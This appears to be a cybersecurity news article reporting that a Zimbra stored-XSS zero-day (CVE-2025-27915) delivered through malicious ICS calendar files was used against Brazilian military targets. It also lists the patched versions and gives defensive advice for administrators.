Zimbra Zero-Day Exploited to Target Brazilian Military via Malicious ICS Files

A newly discovered zero-day flaw in Zimbra Collaboration has been used in real cyberattacks against military organizations in Brazil. Hackers exploited this vulnerability by sending specially crafted calendar files, known as ICS files, which contained malicious code designed to compromise systems. The attack was especially dangerous because it targeted a zero-day vulnerability one that was unknown and unpatched at the time of the exploitation.

The vulnerability, tracked as CVE-2025-27915, is a stored cross-site scripting (XSS) flaw found in Zimbra’s Classic Web Client. The problem occurred because Zimbra failed to properly filter HTML content embedded inside ICS calendar files. This allowed attackers to insert malicious JavaScript code that executed automatically when a user viewed a malicious calendar event.

In the recent campaign, cybercriminals sent fake calendar invites that appeared completely legitimate. Once opened, the hidden script inside the file ran through an ontoggle event within a <details> tag. This gave attackers the ability to execute arbitrary JavaScript in the victim’s Zimbra session effectively hijacking email accounts, stealing sensitive messages, adding secret forwarding rules, or manipulating mailbox behavior.

Investigations revealed that one of the most notable attacks disguised itself as an official message from the Libyan Navy’s Office of Protocol to deceive Brazilian military personnel. The malicious ICS files contained scripts that acted as data stealers, capturing email credentials, contacts, and shared folders. Additionally, the attackers created hidden email filters named “Correo” to automatically forward messages to external addresses under their control.

In response to these attacks, Zimbra quickly released patches to address the issue. The fix was included in ZCS 9.0.0 Patch 44, ZCS 10.0.13, and ZCS 10.1.5, which were all released on January 27, 2025. Security experts strongly advise all Zimbra users and administrators to update to these versions immediately to prevent further exploitation.

According to cybersecurity analysts, the bug affects multiple versions of Zimbra (9.0, 10.0, and 10.1) because the Classic Web Client fails to properly handle HTML in ICS calendar files. When users open one of these malicious calendar entries, the injected JavaScript code runs inside their session, giving attackers unauthorized access to sensitive data and email functions.

Experts are now urging organizations to treat calendar attachments (.ICS files) with the same caution as regular email attachments. They recommend checking email and web client logs for signs of compromise, monitoring for unusual mailbox rules, and reviewing ICS files for suspicious code or large file sizes. Limiting access to ICS uploads or disabling their automatic rendering can also help reduce risk.

For organizations that suspect they may have been targeted, security teams should isolate affected systems, preserve all logs for forensic analysis, and involve professional incident response teams. Reporting incidents to authorities and coordinating with Zimbra’s security team can also help prevent wider spread attacks.

In summary, hackers exploited a serious XSS zero-day vulnerability (CVE-2025-27915) in Zimbra to target Brazil’s military using malicious ICS calendar files. The flaw allowed attackers to run scripts inside user sessions, steal emails, and manipulate mail settings. Zimbra has now patched the issue, but administrators are urged to update immediately, check for suspicious rules or forwarding filters, and strengthen email security defenses to stay protected from similar threats.

Stay alert, and keep your security measures updated!

Source: Follow cybersecurity88 on X and LinkedIn for the latest cybersecurity news